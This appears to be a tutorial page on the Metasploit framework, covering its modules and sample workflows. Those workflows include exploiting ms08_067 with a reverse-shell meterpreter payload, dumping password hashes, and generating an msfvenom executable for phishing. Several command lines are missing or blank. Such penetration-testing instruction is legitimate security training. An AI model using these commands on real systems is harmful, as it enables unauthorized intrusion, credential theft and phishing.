
Metasploit Framework

Metasploit is an open-source penetration testing framework developed by Rapid7. It is widely used for developing and executing exploit code against a remote target machine. The framework provides tools to perform various tasks in penetration testing, such as information gathering, vulnerability scanning, exploitation, and post-exploitation.

Key Components of Metasploit

  1. Modules:

    • Exploit Modules: Contains the code to exploit specific vulnerabilities.

    • Payload Modules: Includes code that runs on the target machine after exploitation (e.g., reverse shells).

    • Auxiliary Modules: Used for scanning, fuzzing, and other non-exploit functionality.

    • Post Modules: Used for post-exploitation activities on a compromised system.

    • Encoders: Used to encode payloads to avoid detection.

    • NOPs: No-operation instructions used to pad out payloads.

  2. Meterpreter: An advanced, extensible payload that provides an interactive shell for executing commands on the target machine.

  3. Database: Metasploit integrates with PostgreSQL to store scan results, exploitation attempts, and other data.

  4. Armitage: A graphical user interface (GUI) for Metasploit, providing visual aids for managing sessions and exploits.

Common Use Cases for Metasploit

  1. Vulnerability Scanning and Exploitation

  2. Information Gathering

  3. Post-Exploitation

  4. Social Engineering

  5. Web Application Testing

  6. Wireless Attacks

  7. Password Attacks

  8. Evasion Techniques

Use Cases with Metasploit

1. Vulnerability Scanning and Exploitation

Example: Exploiting a known vulnerability in a Windows machine using the ms08_067_netapi exploit.


  1. Launch Metasploit:

  2. Search for the exploit:

    search ms08_067
  3. Select the exploit:

    use exploit/windows/smb/ms08_067_netapi
  4. Set the target:

    set RHOST <target_ip>
  5. Set the payload:

    set payload windows/meterpreter/reverse_tcp
    set LHOST <your_ip>
    set LPORT 4444
  6. Run the exploit:


2. Information Gathering

Example: Scanning a network for open ports and services.


  1. Launch Metasploit:

  2. Use auxiliary scanner:

    use auxiliary/scanner/portscan/tcp
  3. Set the target range:

    set RHOSTS
  4. Run the scan:


3. Post-Exploitation

Example: Collecting password hashes from a compromised machine.


  1. Exploit the target and get a Meterpreter session:

  2. Dump password hashes:

    meterpreter > hashdump

4. Social Engineering

Example: Creating a malicious payload for a phishing campaign.


  1. Generate the payload:

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your_ip> LPORT=4444 -f exe > payload.exe
  2. Set up a listener:

    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set LHOST <your_ip>
    set LPORT 4444

Detailed Metasploit Options


Basic Commands:

  • search <term>: Search for exploits, payloads, and other modules.

  • use <module_path>: Load a specific module.

  • show options: Display options for the current module.

  • set <option> <value>: Set a specific option value.

  • exploit: Run the selected exploit module.

  • run: Run the selected auxiliary module.

  • sessions -i <id>: Interact with a specific session.



  • -p <payload>: Specify the payload to use.

  • LHOST=<your_ip>: Set the local host IP.

  • LPORT=<your_port>: Set the local port.

  • -f <format>: Specify the output format (e.g., exe, elf, raw).

  • -o <output_file>: Specify the output file name.


msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -f exe > payload.exe


  1. Metasploit Documentation: Metasploit Docs

  2. Metasploit Unleashed (Offensive Security): Metasploit Unleashed

  3. Metasploit GitHub Repository: Metasploit GitHub

  4. Exploit Database: Exploit DB

By leveraging Metasploit's powerful capabilities, penetration testers can identify and exploit vulnerabilities, gather crucial information, and perform detailed post-exploitation tasks to assess and improve the security posture of an organization.

Last updated

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